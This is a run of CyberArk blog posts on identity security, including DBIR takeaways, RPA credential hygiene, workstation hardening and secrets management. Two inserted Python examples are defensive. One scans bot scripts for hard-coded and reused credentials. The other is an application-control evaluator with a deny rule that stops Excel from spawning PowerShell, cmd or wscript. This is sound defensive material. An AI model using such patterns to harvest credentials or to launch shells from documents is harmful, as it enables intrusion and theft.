7. While some sophisticated supply chain attacks involve many actions over lengthy periods of time, the 2022 DBIR found that a vast majority of attack chains (more than 75%) only include three steps. The most common were phishing, downloader and ransomware — likely made possible, in large part, by the surge in ransomware-as-a-service sold by highly organized criminal enterprises. Every step an attacker takes is an opportunity to get caught. So, report authors noted, “Our job as defenders is to lengthen that attack path.” In our CyberArk team’s view, following zero trust principles by implementing identity security controls such as multi-factor authentication (MFA) and privileged access management (PAM) can help minimize attackers’ movements, their access to sensitive systems and data, and ultimately, their chances of success.

8. Web application risks are the No. 1 attack vector… and 80% of these breaches can be attributed to, you guessed it, credential theft. No surprise here, since web apps are exposed to the internet and, in turn, to external attackers.

9. But what’s new is the addition of software updates to the list of top action vectors for web application attacks — coming in hot at 60%. With the landmark SolarWinds breach as their guide, attackers are increasingly distributing malware through software updates — and they’re targeting things like developer workstations, DevOps and automation tools that hold powerful privileges. In the words of the report authors, “One thing is certain, stolen creds and web apps go together like peanut butter and chocolate.”

10. When securing web applications, it’s important to consider privileged “insider” identities. Though the Verizon DBIR classifies them separately, it’s also important to consider how insider threats factor into the broader web application risk equation. According to CyberArk research, the average employee has access to more than 30 applications and accounts, and 52% of organizations’ workforces have access to sensitive corporate data. And 80% of organizations experienced employees misusing or abusing access to business applications in the past year — highlighting a widespread need for better visibility into user sessions and activities.

11. While we’re on the subject, are insider threat risks really that low? The 2022 Verizon DBIR found that an organization is about four times more likely to be attacked by an external actor than an insider. But take that with a grain of salt, as it’s likely more insider jobs go unreported and even undetected. A legitimate identity using legitimate credentials for the wrong reasons — especially someone with legitimate privileged access to sensitive resources — is hard to find unless you have ways to detect malicious or unusual behavior right away.

12. Based on the insider incidents analyzed in the Verizon DBIR, privilege misuse, defined as “the pattern where people use the legitimate access granted to them as employees,” is 2.5 times more likely to be accidental than malicious. But when it’s intentional, internal threat actors are most likely to go after personal data of customers, employees or partners, the report found. As in years past, healthcare remains the industry with the highest number of malicious internal actors, and 22% of privilege misuse-related breaches targeted medical data.

13. The report found that error is responsible for 13% of all breaches, with the bulk of them stemming from misconfigured cloud storage. Considering how many digital identities live in the digital stratosphere today, this isn’t surprising, but it raises a question: When does “human error” become “humanly impossible?” Keeping thousands or hundreds of thousands of permissions properly configured all the time isn’t something most IT teams can do manually, especially since securing access to and within cloud environments is a relatively new discipline. As cloud migrations continue, AI and automation will be key to curbing identity-centric security challenges.

14. Fifty-eight percent of mobile devices had at least one malicious URL clicked and 16% had at least one malware or riskware app installed. In the past few “contactless” years, people have become accustomed to using their phones for just about everything, from paying for goods to perusing restaurant menus. But remember, phishing is phishing — whether it’s a link in an email or a malicious QR code. And since “almost a fifth of phishing successes came from mobile devices, that should be good enough confirmation that it needs to be within your security estate,” cautioned report authors.

15. A whopping 82% of all analyzed breaches involved the human element when tallying up those due to human error, misuse of privilege (by legitimate identities) and social engineering. This highlights the need to approach cybersecurity holistically — not only emphasizing important technical security controls, but also people-centric initiatives. For instance, respondents in the CyberArk 2022 Identity Security Threat Landscape Report indicated cybersecurity awareness training was one of the top three most effective components of a defense-in-depth strategy to combat ransomware.

Read the entire 108-page 2022 Verizon DBIR to explore full findings, including industry- and region-specific attack patterns and trends. And to learn more about the role identity plays in almost every major cyberattack today, read our latest global research.

RPA and the Speed vs. Security Balancing Act https://www.cyberark.com/blog/rpa-and-the-speed-vs-security-balancing-act/ Tue, 24 May 2022 13:00:40 +0000 https://www.cyberark.com/?p=131185 RPA and the Speed vs. Security Balancing Act

Robotic process automation, or RPA for short, is one of those hefty technical terms that can be tough to explain without a lot of jargon. But at the highest level, RPA is all about using software to improve human experiences.

RPA automates repetitive tasks so employees can focus on meaningful work, while customers reap the benefits of superior products and services. In the healthcare field, for example, RPA is used to automate manual scheduling, billing and claims management processes so providers can spend more time with their patients.

But without a strong Identity Security framework in place, RPA can run counter to its core purpose, driving up cybersecurity debt and exposing the organization to risk. Development and deployment challenges only increase as RPA scales, evidenced by the 74% of organizations that say they’ve slowed RPA and bot deployments due to security concerns. Much like a tightrope walker navigating a line, unlocking the full value of RPA requires a careful balancing act between two extremes: security and speed.

RPA Risks and the Security Imperative

As with every digital initiative, RPA deployments create multitudes of new digital identities in the form of RPA bots. Each of these bots requires privileged credentials to access business-critical applications, resources and other sensitive systems to do their jobs — whether that’s data entry, reconciliation, data transfer, report generation or something else. And in the case of “unattended bots,” there’s no human interaction or supervision over this process, which can be risky. If attackers get their hands on these privileged credentials — as they so often try to do — they could reprogram bots for malicious purposes such as destroying data, shutting down operations, sabotaging systems, redirecting payments or distributing malware.

RPA and the Need for Speed

In some organizations, bot developers are on the IT team, but increasingly, “citizen developers” — non-IT employees using technology to make workflows more efficient for themselves and their teams — assume the role of handling automation and scaling RPA initiatives. These users aren’t necessarily focused on security or aware of how common security shortcuts can create potentially huge problems. Bot developers need an intuitive, automatic way to manage bot credentials — otherwise, speed will trump security nearly every time.

Striking the Right Balance as RPA Scales

Following these five steps can help bring the two seemingly conflicting priorities of security and speed into alignment:

1. Involve security from the start. In many cases, security teams don’t even know about RPA initiatives until they’re called in to approve them at the last minute, which can hold things up and create frustration on both ends. Involving security from the start of an RPA project to help establish security standards and get everyone on the same page will save time in the long run.

2. Examine existing bot controls. Review existing credential management policies to identify potential gaps: Where are credentials stored? Are parameters in place to help ensure passwords are unique and complex? How often are these credentials rotated? Are authentication layers in place for credential retrieval? Is there a way to monitor and audit credential use?

3. Eliminate excessive permissions. How data is handled is just as important as how it’s accessed. As a rule, bots should not be able to access other applications or databases outside of their required tasks. Take steps to review and understand what each individual bot can access and eliminate excessive permissions wherever possible.

4. Put a moratorium on hard-coded credentials. Embedding authentication data directly into source code expands the attack surface and can create major issues. For one, hard-coded credentials are difficult — if not impossible — to rotate, as this practice prevents passwords to critical systems from being changed without causing major disruptions to operations. Worse still, hard-coded credentials expose credentials when scripts are shared (including publicly when scripts are in code repositories). And when credentials are reused, attackers can use bots to move laterally and escalate privileges.

5. Look for every opportunity to automate. While straightforward, implementing the above best practices at scale is very difficult to do manually across thousands — or even hundreds of thousands — of bots. Automating credential management processes wherever possible will help remove much of the security burden on employees — whether they’re developing RPA bots or tasked with approving deployments. For example, by storing all credentials in a centralized repository, organizations can enforce fixed security standards for bots and applications, automatically create complex passwords and rotate them regularly, and remove hard-coded credentials from bots and secure them.
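As an added example (not CyberArk’s or any RPA vendor’s code) of the review in steps 2 and 4, the scanner below reads bot script text, reports credential literals assigned in source, skips values that are clearly fetched from a vault or a template at runtime, and lists any secret shared by more than one bot, the reuse that lets a compromise of one bot reach the others. The matching rules and the three sample bot scripts are constructed.

```python
"""Added example (not CyberArk's or an RPA vendor's code): scan RPA bot scripts
for hard-coded credentials and for secrets reused across bots. Matching rules
and the sample bot scripts are constructed."""
import re
from collections import defaultdict

# A credential-looking name assigned a quoted literal: password = "...",
# api_key: '...', CLIENT_SECRET="...". Heuristic; tune the name list to your bots.
_SECRET_ASSIGN = re.compile(
    r"""(pass(?:word|wd)?|secret|api[_-]?key|token|client[_-]?secret)"""
    r"""\s*[:=]\s*['"]([^'"]{4,})['"]""",
    re.IGNORECASE,
)
# Values resolved at runtime from a vault reference, template or environment
# are the goal of step 4, not a finding, so they are skipped.
_PLACEHOLDER = re.compile(r"^(\$\{|\{\{|<|%)|^(changeme|xxx+)$", re.IGNORECASE)


def find_hardcoded(script: str) -> list:
    """Return (line_no, name, value) for every credential literal in one script."""
    hits = []
    for no, line in enumerate(script.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # commented-out lines can be reported by a separate pass
        for m in _SECRET_ASSIGN.finditer(line):
            if not _PLACEHOLDER.match(m.group(2)):
                hits.append((no, m.group(1), m.group(2)))
    return hits


def review_bots(bots: dict) -> dict:
    """Scan every bot; report per-bot findings and any literal shared by several
    bots, since one reused credential lets a compromise of one bot reach the rest."""
    per_bot = {name: find_hardcoded(src) for name, src in bots.items()}
    owners = defaultdict(set)
    for name, hits in per_bot.items():
        for _, _, value in hits:
            owners[value].add(name)
    return {
        "hardcoded": {n: h for n, h in per_bot.items() if h},
        "reused": {v: sorted(b) for v, b in owners.items() if len(b) > 1},
    }


# Constructed sample bots: two embed the same ERP password; the third reads its
# token from a vault reference (the pattern step 5 recommends).
SAMPLE_BOTS = {
    "invoice_bot.py": 'ERP_USER = "svc_rpa"\nERP_PASSWORD = "Summer2022!"\n',
    "claims_bot.py": "db_password = 'Summer2022!'\napi_key = os.environ['CLAIMS_API_KEY']\n",
    "report_bot.py": 'token = "${VAULT:report-bot/token}"\n# password = "old-one"\n',
}

if __name__ == "__main__":
    # Handle this report as sensitive: it carries the literal credentials found.
    report = review_bots(SAMPLE_BOTS)
    for bot, hits in report["hardcoded"].items():
        for no, name, _ in hits:
            print(f"{bot}:{no}: hard-coded {name}")
    for value, bots in report["reused"].items():
        print(f"one secret reused by {', '.join(bots)}")
```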

Establishing a secure, automated Identity Security framework can help ensure RPA initiatives do what they’re supposed to do: improve experiences by eliminating delays, simplifying deployments and addressing security issues — before you even know you have them.

6 Best Practices for Securing Employee Workstations Everywhere https://www.cyberark.com/blog/6-best-practices-for-securing-employee-workstations-everywhere/ Thu, 19 May 2022 13:00:45 +0000 https://www.cyberark.com/?p=131132 6 Best Practices for Securing Employee Workstations Everywhere

The future of work is “less about a place and more about people’s potential,” notes a recent Accenture study, which found that 63% of high-growth companies have already adopted “productivity anywhere.”

Organizations around the world are fast embracing this hybrid workforce model that puts employee workstations at the edge, far beyond the “walls” of the traditional corporate network. Nearly all our CyberArk Remediation Services team’s recent engagements reflect this reality: workstations are now one of the easiest ways for attackers to compromise identities, launch ransomware attacks, exploit privileged credentials and start moving toward sensitive IT systems and exfiltrating confidential data.

By the time incident response experts are engaged, attackers have proliferated throughout the environment. Many organizations believe that deploying endpoint security protections during a cyber attack is like putting storm windows on your house in the middle of a hurricane. Our remediation services engagements have consistently found that organizations can accelerate recovery efforts by implementing the following foundational Identity Security controls at the endpoint before an inevitable attack. These foundational controls include:

1. Remove local admin rights. Microsoft Windows, macOS and Linux administrator accounts are used to install and update workstation software, configure system settings and manage user accounts. Attackers target these privileged accounts to disable antivirus software or disaster recovery tools and launch ransomware and other types of malicious software. Moving local admin rights away from standard users and into a secure digital vault with credential rotation is the fastest and simplest step toward hardening employee workstations. It dramatically limits an adversary’s reach, while minimizing the impact of unintentional (yet inevitable) employee errors, such as clicking on a phishing link.

2. Enforce least privilege. Employees often have a legitimate need to perform an action requiring administrative privileges. Just-in-time privileged access enables workers to perform certain specified tasks, based on policy, at the right time for the right reason — without requiring end-user action or help-desk intervention that can hinder productivity.

3. Institute application control policies. Blocking ransomware and other attacks at the endpoint requires more than just the ability to allowlist and denylist known applications. Organizations must be able to:

  • “Greylist” applications, such as sandboxing an unknown application and allowing it to run but not access the internet to reduce ransomware risks.
  • Implement advanced conditional policies, so workers can use trusted applications safely. For example, allow Excel to run but prohibit it from launching PowerShell to defend against BazarBackdoor malware.
  • Create comprehensive rules covering specific executables (e.g., by matching on a hash, file name or file path) as well as groups of executables (e.g., default-allowing applications that are signed by a specific vendor, have a specific product name associated with them and originate from a designated trusted updater source).
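A toy policy evaluator for the rule kinds just listed, added here as an illustration and not taken from any CyberArk product: it checks a process launch against hash and path allow/deny entries, a (signer, product, origin) group rule, a parent/child conditional rule such as Excel not being allowed to spawn PowerShell, and greylists anything it does not recognize. All paths, hashes, signer and product names below are constructed sample values.

```python
from dataclasses import dataclass, field
from typing import Optional
import ntpath


@dataclass(frozen=True)
class Executable:
    """Attributes an application-control policy can key on (all values constructed)."""
    path: str
    sha256: str            # hex digest of the file contents
    signer: str = ""       # subject of the code-signing certificate
    product: str = ""      # product name from the file's version resource
    origin: str = ""       # how the file arrived on disk, e.g. "trusted-updater"

    @property
    def name(self) -> str:
        return ntpath.basename(self.path).lower()


@dataclass(frozen=True)
class Launch:
    """A process-start event: the executable and, if known, its parent process."""
    exe: Executable
    parent: Optional[Executable] = None


@dataclass
class Policy:
    deny_hashes: set = field(default_factory=set)
    allow_hashes: set = field(default_factory=set)
    allow_paths: set = field(default_factory=set)        # lower-cased full paths
    trusted_groups: set = field(default_factory=set)     # (signer, product, origin) tuples
    blocked_children: dict = field(default_factory=dict) # parent name -> {child names}


def evaluate(policy: Policy, launch: Launch) -> tuple:
    """Return (decision, reason); decision is 'deny', 'allow' or 'greylist'.

    Evaluation order: explicit hash deny, conditional parent/child deny,
    explicit allows, group allows, then greylist for anything unknown
    (the endpoint would run it sandboxed with no network access).
    """
    exe = launch.exe
    if exe.sha256 in policy.deny_hashes:
        return "deny", f"hash {exe.sha256[:12]}... is on the denylist"
    if launch.parent is not None:
        blocked = policy.blocked_children.get(launch.parent.name, set())
        if exe.name in blocked:
            return "deny", f"{launch.parent.name} may not spawn {exe.name}"
    if exe.sha256 in policy.allow_hashes or exe.path.lower() in policy.allow_paths:
        return "allow", "explicit allow by hash or path"
    if (exe.signer, exe.product, exe.origin) in policy.trusted_groups:
        return "allow", f"group allow for signer '{exe.signer}'"
    return "greylist", "unknown executable: run sandboxed without internet access"


# Constructed sample inventory; the hashes are placeholders, not real file digests.
EXCEL = Executable(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "a" * 64,
                   signer="Microsoft Corporation", product="Microsoft Office",
                   origin="trusted-updater")
POWERSHELL = Executable(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "b" * 64,
                        signer="Microsoft Windows", product="Microsoft Windows",
                        origin="os-image")
UNKNOWN = Executable(r"C:\Users\alice\Downloads\invoice_viewer.exe", "c" * 64)
# Looks like a trusted Office component but its hash was explicitly denied.
KNOWN_BAD = Executable(r"C:\Users\alice\AppData\Local\Temp\update.exe", "d" * 64,
                       signer="Microsoft Corporation", product="Microsoft Office",
                       origin="trusted-updater")

POLICY = Policy(
    deny_hashes={"d" * 64},
    trusted_groups={("Microsoft Corporation", "Microsoft Office", "trusted-updater"),
                    ("Microsoft Windows", "Microsoft Windows", "os-image")},
    blocked_children={"excel.exe": {"powershell.exe", "cmd.exe", "wscript.exe"}},
)

if __name__ == "__main__":
    events = [Launch(EXCEL), Launch(POWERSHELL), Launch(POWERSHELL, parent=EXCEL),
              Launch(UNKNOWN), Launch(KNOWN_BAD)]
    for ev in events:
        decision, reason = evaluate(POLICY, ev)
        print(f"{decision:8} {ev.exe.name:20} {reason}")
```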

4. Protect cached credentials. Credential theft is the No. 1 area of risk for organizations today. Many popular business applications allow credentials to be stored in memory, and many web browsers and password managers cache application and website credentials locally. Once logged in with these stolen credentials, attackers may try to circumvent single sign-on (SSO) solutions as well. Since threat actors can often retrieve cached credentials without ever needing admin privileges, having the ability to automatically detect and block credential harvesting attempts is a crucial endpoint security layer.

5. Set up traps. And speaking of detection, endpoint protection tools that support privilege deception functionality — such as being able to create fake “honeypot” privileged accounts — can help flag would-be attackers right off the bat.

6. Monitor privileged activities. Attackers often fly under the radar, probing defenses and planning their next moves. By proactively monitoring privileged workstation activity, organizations can automatically identify and stop adversaries before they can move laterally, escalate privileges and inflict serious damage. Having complete records of privileged workstation activity is also key in streamlining compliance audits and speeding forensics investigations.

Inadequately protected employee workstations represent a common security gap — one I’ve seen too many times in my incident response work. If I could offer one piece of advice for organizations looking to shore up security against ransomware and other damaging attacks, it’s this: don’t wait — behave as if you’ve just been breached. By following key Identity Security-centric steps to mitigate risk, as well as separating workstations from servers and embracing a layered defense-in-depth strategy, your organization will be better equipped to isolate attacker activity, minimize impact, regain control of your environment and restore trust quickly and efficiently.

]]>
CyberArk Ventures: Bringing Security-First Innovators Together to Amplify Impact https://www.cyberark.com/blog/cyberark-ventures-bringing-security-first-innovators-together-to-amplify-impact/ Thu, 12 May 2022 10:45:04 +0000 https://www.cyberark.com/?p=130755 Introducing CyberArk Ventures

Security is our north star at CyberArk. It guides every step we take as a company, from pioneering the Privileged Access Management space to delivering on our Identity Security vision today. Our continued focus on security-first innovation is why more than 7,000 organizations around the globe entrust CyberArk to secure their most critical assets.

During the past several years, the digital world has become a much larger, more interconnected and increasingly vulnerable place. Advancements in cloud, DevOps, machine learning and automation are driving transformation and economic progress. They have also created new threats and expanded the attack surface, creating more opportunities for cyber attackers seeking to take down organizations, cripple supply chains and critical infrastructure and unleash chaos. As a result, cyber threats are among the greatest challenges facing organizations today.

It is important to emphasize that the security problems the public and private sectors are all grappling with are vast and complex. No one company can do it all. Now, more than ever, security is a team game.

That’s why we’re proud to launch CyberArk Ventures today. We’ve initially aligned with four venture capital investors including Venrock, YL Ventures, Team8 Capital and Merlin Ventures, bringing the next generation of cybersecurity innovators to the race against identity-related threats and strengthening cyber resilience from every angle.

In setting our strategy and embarking on this journey, we’ve been inspired by talented entrepreneurial teams around the world that demonstrate the ingenuity, technical acumen and commitment needed to reduce systemic cybersecurity risk. Our goal with CyberArk Ventures is to foster and accelerate this innovation by providing financial backing and access to go-to-market support.

CyberArk has devoted $30 million to the CyberArk Ventures fund, which is actively deploying capital. Initial fund recipients represent a powerful trifecta of network security, application security and data security that complements our Identity Security vision and security-first approach to securing all identities — human and machine — wherever they exist. Our “team” needs players of all kinds across multiple cybersecurity dimensions. If you’re part of an early-stage company that’s serious about security, is taking a novel approach to solving a big business challenge and is pushing past boundaries to unlock greater value and results for customers, we want to hear from you.

We are excited about the future of CyberArk Ventures and believe it can serve as a force multiplier for good. With an experienced leadership team here at CyberArk, a world-class collection of initial investors and the next-generation of cybersecurity disrupters all united by a shared mission and purpose — just imagine the possibilities!

For more information on CyberArk Ventures, check out the infographic below.

CyberArk Ventures Infographic

]]>
4 Extraordinary Women in Identity Security Named to CRN’s 2022 Women of the Channel List https://www.cyberark.com/blog/4-extraordinary-women-in-identity-security-named-to-crns-2022-women-of-the-channel-list/ Tue, 10 May 2022 13:19:14 +0000 https://www.cyberark.com/?p=130924 4 Women in Identity Security Named to CRN’s 2022 Women of the Channel List

Each year, CRN’s Women of the Channel list honors the accomplishments of female leaders in the IT channel. Today, we celebrate four of CyberArk’s own incredible Women in Identity Security named to CRN’s newly published 2022 list for their vision, leadership and dedication to channel excellence.

Over the past year, these fearless females have played integral roles in extending CyberArk’s market leadership position and empowering CyberArk partner organizations to accelerate growth as they help customers protect against advanced cyber threats and realize the full value of Identity Security:

Cindy Baptiste, Senior Director, Global Partnerships and Channel Sales, CyberArk

As part of her role in defining and executing CyberArk’s global go-to-market channel strategy, Baptiste worked cross-functionally to introduce six products to the channel. By delivering a tremendous increase in partner enablement and certifications, her team has helped grow the overall channel business by more than 35% year over year.

Stephanie Novak, Director, Global Partner Programs, CyberArk

With deep expertise in change management and transformation — along with a roll-up-her-sleeves attitude — Novak has brought both competency and capacity to the CyberArk team. By analyzing current program offerings and processes, she’s been instrumental in defining key initiatives for the CyberArk Partner Program roadmap — including new enhancements that will roll out this year.

Tonya Vincent, Director, Global Channel Marketing, CyberArk

Keeping partners informed of plans, product innovations and enablement resources is critical to growing an effective channel program. From organizing CyberArk’s first global channel partner conference to optimizing its global MDF program, Vincent spearheaded efforts to amplify communication, information sharing and engagement across the CyberArk Partner Network.

Kelly Wong, Channel Process and Technology Manager, CyberArk

Wong’s work in designing and implementing channel operational strategies, processes and policies for partners has been integral in optimizing the health of the channel program and back-office functions to enable a best-in-class partner experience.

CRN asked how these Women in Identity Security are bringing comprehensive channel initiatives to life, and what advice they have for women entering the cybersecurity market. Here’s just a glimpse at their responses:

As the IT landscape changes rapidly, customers and their buying patterns are also changing. How is CyberArk enabling partner organizations during this shift, so they can maximize opportunities to help their customers secure access across any device, anywhere, at just the right time? 

Says Baptiste, “With CyberArk’s shift to subscription and SaaS-based delivery, we’re providing partners with more opportunities to open their business beyond the transactional space and deepen customer value. To do this, we’re helping selling partners become great delivery and managed services providers, as well as co-creators of IP with the CyberArk Identity Security Platform as the underpinning of the Identity Security frameworks they’re building for their customers. This puts the focus on delivering successful business outcomes for customers.”

What is your advice to partner organizations for maximizing their success in 2022?

Says Novak, “Engage with your Channel Account Manager (CAM) regarding your go-to-market and customer engagement models — whether it’s resell, consulting, managed services or a combo to find the right programmatic elements that align with your business models. Focus solutions on delivering business outcomes that create value and drive customer success. To do so, you will need a well-enabled team of sales and technical professionals who can deliver a polished customer experience.”

How does hiring play a part in delivering amazing partner experiences?

Baptiste says, “My team’s charter is to be the ‘easy button’ for partners and for the CyberArk Global Channel Organization. We accomplish this by hiring the best people, giving them the freedom to do what they are experts at doing, collaborating on best practices based on collective experience and market trends, and providing a fun and exciting environment which keeps them motivated and driven to continue to build a best-in-class partner experience.” She credits her incredible team in the successful rollout of new continuing education modules, which resulted in an impressive 190% year-over-year increase in partner certifications.

What’s one thing you love about your job and why?

“The people and culture at CyberArk,” says Vincent. “My marketing teammates are the best — not only are they super supportive, but they also have a channel-first mindset. Additionally, the global channel sales organization is top-notch. Filled with experienced leaders and channel account managers, they make my job fun.”

What are your secrets for staying focused and finding motivation when you really need it?

“Surround yourself with positive and smart people: teams, friends and family. These people will continue to challenge your mind and give you new perspectives,” encourages Wong.

This fearsome foursome closes with advice for women entering the cybersecurity market.

“Don’t be afraid to ask for help,” notes Baptiste. “Find people you respect and build relationships with them. And go outside of your comfort zone. That’s where the magic can happen, and you learn and grow in the most unexpected ways.”

“Find your tribe. Reach far and wide in many areas of the business and build strong, lasting and meaningful relationships. It will help you in your current role and also give you access to subject matter experts that you can call when you have questions about how to handle challenges,” says Novak.

Look beyond your organization as well, encourages Vincent. “Establish mentors and peers outside of work through LinkedIn and groups like Women of the Channel. This outside network offers great advice, recommendations and support at any time,” she says.

“Always tackle a challenge/problem/issue/task with a positive frame of mind. At the end of it all, you’re doing it to make things better for yourself and everyone else,” says Wong.

Editor’s Note: Answers have been edited for length and clarity. CRN’s 2022 Women of the Channel list will be featured in the June issue of CRN Magazine and online at www.CRN.com/WOTC.


]]>
CISOs Are Having a Moment. Here’s How to Make It Last https://www.cyberark.com/blog/cisos-are-having-a-moment-heres-how-to-make-it-last/ Fri, 06 May 2022 16:49:00 +0000 https://www.cyberark.com/?p=130764 CISOs Are Having a Moment. Here's How to Make It Last

The landmark Sarbanes-Oxley Act of 2002 (SOX) was passed during a highly tumultuous era, overhauling corporate governance and bringing financial expertise to the boardroom. Fast-forward to present day, and uncertainty is again the prevailing economic theme; more than 70% of organizations have experienced ransomware attacks in the past year, and 64% admit they cannot stop a supply chain-related attack. As they did 20 years ago, regulators are calling for sweeping change: this time for increased cyber disclosures by public companies, and specifically, greater cybersecurity aptitude at the corporate director level. Once again, boards are poised for a shakeup, one that legal experts say will bring more CISOs to the table.

As their strategic role expands, many CISOs around the world are “having a moment,” bolstered by growing top-level support and additional resources to advance their cybersecurity missions. But making the most of this moment — and making it last — will come down to focus across four key areas.

1. Focus on data

While four out of five organizations increased their cybersecurity budgets in 2022, no security leader has enough resources to tackle everything on their to-do list at once. Risk quantification is a continued challenge: a Harvard Business Review Analytic Services survey sponsored by PwC found that less than half (45%) of executives “strongly agreed” that they had a formalized process to evaluate cyber risks in line with business priorities. The survey shows a small but growing number of CISOs are turning to frameworks such as the open-source FAIR (Factor Analysis of Information Risk) methodology, analyzing causal relationships in high-risk scenarios or deploying actuarial models to get a more accurate financial estimate of the threats their companies face. Since these risk models are only as strong as the data that feed them, security tools that can enhance intelligence gathering, broaden visibility and deepen contextual insights are critical for communicating risk in business terms and optimizing cybersecurity spending.

2. Focus on impact

While threats and business priorities change, identity’s integral role in the cyber attack chain does not. The latest Identity Defined Security Alliance (IDSA) research indicates 79% of organizations have experienced an identity-related breach within the last two years, and 93% believe they could have prevented or minimized security breaches if they had implemented specific identity-related security outcomes. Any identity — human or machine — located anywhere across business applications, distributed workforces, hybrid cloud workloads or throughout the DevOps lifecycle can be compromised and open an attack path to an organization’s most valuable assets. With this understanding comes focus: more than half of CISOs and CIOs have introduced (or plan to introduce) Identity Security measures to better manage sensitive access, including real-time monitoring and analysis to audit all privileged session activity, enforcing least privilege security and Zero Trust principles on infrastructure that runs business-critical applications and implementing processes to isolate business-critical applications from internet-connected devices to restrict lateral movement.

3. Focus on business enablement

CISOs can play a powerful strategic role in driving high-stakes digital initiatives forward. What’s key is inserting themselves into these projects from the beginning — to educate IT and line-of-business owners on security and privacy risks and establish consistent, Zero Trust-centric processes such as securing user access to the very applications that fuel transformation initiatives. Doing so can also help CISOs stay in alignment with key stakeholders and better balance investments between digital initiatives and critical security protections to avoid cybersecurity debt accumulation that can hamstring progress.

4. Focus on user experience

When end users can’t navigate the security process or must contend with too many different security tools, they often find workarounds, make poor password choices or take other actions that can lead to identity-based vulnerabilities attackers can exploit. Eighty-six percent of senior security leaders say user experience (UX) optimization is “important” or “very important,” and many are wisely focused on incorporating controls that work to secure access — regardless of device or location and at just the right time — while keeping users productive and informed. AI, machine learning and automation can help make Identity Security processes more effective and more user-friendly over time by mapping behavior patterns and contextual signals and continuously optimizing controls based on these learnings and dynamic risks.

The Power of Focus

In a 2021 global survey of CISOs, recruiting firm Heidrick & Struggles found that nearly half of CISOs want to be board members — something that seems increasingly achievable and essential to building organizational cyber resilience. By maintaining a focused approach across these four areas, CISOs can demonstrate their strategic capabilities, strengthen the boardroom and confidently defend against attacks as they take their hard-earned and long-overdue seat at the table.

]]>
You’ve Got Privileged Access Management… But Can You Keep Secrets Secure? https://www.cyberark.com/blog/youve-got-privileged-access-management-but-can-you-keep-secrets-secure/ Tue, 03 May 2022 13:00:33 +0000 https://www.cyberark.com/?p=130725 You’ve Got Privileged Access Management… But Can You Keep Secrets Secure?

Threat actors don’t often need to execute the latest zero-day exploit or fight through firewalls to launch their attacks. Instead, they simply walk through the front door with stolen user credentials and take over legitimate digital identities. But while cyber attacks can be inevitable, damage and disruption are not. Organizations that take a privilege-centric approach to securing identities — both human and machine — are better positioned to stop attackers from reaching valuable assets and data.

In the Beginning, There Were Human Identities. Then, Non-Human Identities Emerged in Full Force

As organizations accelerate major digital initiatives and employ automation across their enterprise, continuous integration and continuous delivery (CI/CD) and DevOps methodologies have become the key to moving fast and staying agile. And applications — from traditional software solutions hosted in corporate data centers to modern applications running in the cloud — are the backbone of modern business. Identity Security programs must evolve and extend across these areas, weaving Privileged Access Management into the fabric of enterprise strategy and application pipelines.

Applications, DevOps tools and development and delivery pipelines are full of identities. It’s just that “identities” take on a different, non-human form in these dynamic environments: they’re applications, scripts, automation tools and myriad other machines. Each one requires secrets — SSH keys, API keys and other credentials — to access IT systems and other sensitive resources to do what they’re supposed to do. These secrets and credentials are highly attractive targets and the primary means for attackers to gain a foothold into an organization.

Application Secrets and Credentials are Everywhere

As non-human identities outnumber human identities by 45x on average, protecting this significant piece of the digital identity equation is imperative. Yet the CyberArk 2022 Identity Security Threat Landscape Report found that in many organizations, secrets management practices have not kept pace with the speed of digital innovation:

  • Secrets are stored in multiple places, according to 87% of respondents
  • Half said application credential security was left up to developers — a functional group known for emphasizing speed over security
  • 80% agreed developers have more privileges than they need

The SolarWinds digital supply chain attack, Codecov and other major incidents have made enterprise executives increasingly aware of the critical need to secure secrets in applications and development environments. Yet the CyberArk report revealed 62% of organizations have done nothing to secure their software supply chains post-SolarWinds, even though 71% said their organization has suffered damages from a supply chain-related attack since the landmark breach.

Extending a Solid Privilege-based Security Foundation to Manage Secrets

According to Gartner®, security and risk management leaders responsible for IAM should “Expand the scope and benefit of your PAM programs by making full use of the full feature set of your PAM tools, especially secrets management for DevOps use cases, and CIEM for IaaS visibility.”1

With a solid Privileged Access Management foundation in place, security teams must now focus on expanding their Identity Security programs to encompass all facets of privileged access. That means securing human and non-human identities throughout the cycle of accessing critical assets — without slowing down development teams or delaying automation deployments.

It can be challenging to know where to start. Most organizations will need to secure an array of applications developed and maintained by different teams using different tools and hosted in different locations using various deployment models (on-prem, private cloud, public cloud or hybrid environments). Some applications are more critical to the business than others. Some are more mature and more difficult to adapt than others. And each application poses a special set of risks. Few security teams have the time or resources to take on all these challenges at once.

That’s where an agnostic, risk-aligned framework can help prioritize efforts by introducing Identity Security controls in stages, depending on your organization’s specific requirements. Take advantage of the following resources as you create a plan to give applications easy access to the secrets they need, while keeping credentials out of reach from attackers.

1 – Gartner, Critical Capabilities for Privileged Access Management, Felix Gaehtgens, Abhyuday Data, Michael Kelley, Swati Rakheja, 19 July 2021

Gartner Disclaimers

GARTNER® is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.


]]>
CyberArk SaaS Solutions Now In-Process for FedRAMP High Authorization https://www.cyberark.com/blog/cyberark-saas-solutions-now-in-process-for-fedramp-high-authorization/ Wed, 27 Apr 2022 15:30:51 +0000 https://www.cyberark.com/?p=130534 CyberArk SaaS Solutions Now In-Process for FedRAMP High Authorization

The Biden Administration’s Executive Order (EO) on “Improving the Nation’s Cybersecurity (14028)” and memorandum on “Moving the U.S. Government Toward Zero Trust Cybersecurity Principles (OMB M-22-09)” have underscored Identity Security’s key role in protecting sensitive government data and infrastructure from supply chain-related attacks and other emerging threats.

Reinforcing CyberArk’s commitment to providing trusted, independently verified Identity Security solutions to the U.S. Government, we are announcing today that two of our leading SaaS offerings, CyberArk Endpoint Privilege Manager and CyberArk Identity, are now “In-Process” for Federal Risk and Authorization Management Program (FedRAMP) High authorization.

FedRAMP is a government-wide program that promotes the adoption of secure SaaS services across the U.S. Federal Government by providing a standardized approach to security assessment, authorization and continuous monitoring for cloud products and services. FedRAMP empowers government agencies to use modern cloud technologies, with an emphasis on security and protection of federal information. FedRAMP also serves as an important validation for U.S. state and local governments. Many organizations in the private sector look to the FedRAMP Marketplace for SaaS solutions that have met the government’s most stringent requirements for confidentiality, integrity, and availability.

As the highest level of authorization, FedRAMP High was introduced to account for some of the government’s most sensitive, unclassified data in cloud computing environments. Some of this data involves protecting the lives, reputations, and financial well-being of U.S. residents.

